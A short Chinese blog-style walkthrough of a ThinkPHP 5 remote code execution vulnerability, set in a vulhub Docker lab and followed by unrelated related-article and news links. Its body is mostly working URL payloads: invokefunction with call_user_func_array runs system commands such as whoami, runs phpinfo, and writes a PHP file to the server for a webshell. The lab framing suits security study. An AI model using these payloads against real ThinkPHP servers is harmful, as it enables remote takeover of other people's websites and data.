当前位置: 首页 > news >正文

Thinkphp(TP)框架漏洞攻略

news 来源:原创 2025/5/7 1:48:03

1.环境搭建

vulhub/thinkphp/5-rce

docker-compose up -d

 2.访问靶场

远程命令执行:

? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=whoami 

远程代码执行:

 ? s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[ 1][]=-1

3.Getshell

? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=echo "<?php phpinfo();?>" >>1.php

方式二: 利用工具

相关文章:

  • Docker 可视化工具 Portainer
  • 【2025】基于springboot+spark的电影推荐系统(源码、万字文档、图文修改、调试答疑)
  • 【Tomcat】部署及优化
  • 阿里云国际站代理商:怎样针对4G/5G网络优化CDN参数?
  • Pyserial库使用
  • 蓝桥杯学习-14子集枚举,二进制枚举
  • 高速电路设计之电源分类及其应用要点
  • netplan是如何操控systemd-networkd的? 笔记250324
  • 深入理解Spring框架:核心概念与组成剖析
  • Android第六次面试总结(okhttp篇)
  • Proteus8打开Proteus7文件(.DSN格式)的方法
  • Ceph集群2025(Squid版)导出高可用NFS集群(下集 )
  • 如何在多个GPU中训练非常大的模型?
  • 【编程】面向对象编程和函数式编程
  • 手撕C++ STL list容器:从指针缠绕到迭代器封装的实践笔记
  • 【大模型】DeepSeek攻击原理和效果解析
  • dify0.15.3升级至dify1.1.2操作步骤
  • 【DFS】羌笛何须怨杨柳,春风不度玉门关 - 4. 二叉树中的深搜
  • 高效PDF翻译解决方案:多引擎支持+格式零丢失
  • Android第六次面试总结(Java设计模式篇一)
  • 福特汽车撤回业绩指引,警告关税或造成15亿美元利润损失
  • 六大车企一季报:比亚迪近92亿净利稳居第一,多家车企营收下滑
  • 哈马斯官员:进一步停火谈判毫无意义
  • 金沙记忆|元谋龙街渡:是起点也是终点
  • 国产基因测序仪龙头华大智造业绩持续承压,今年有望迎来拐点?
  • 库里22分赢下抢七大战,火箭10年难破“火勇大战”的魔咒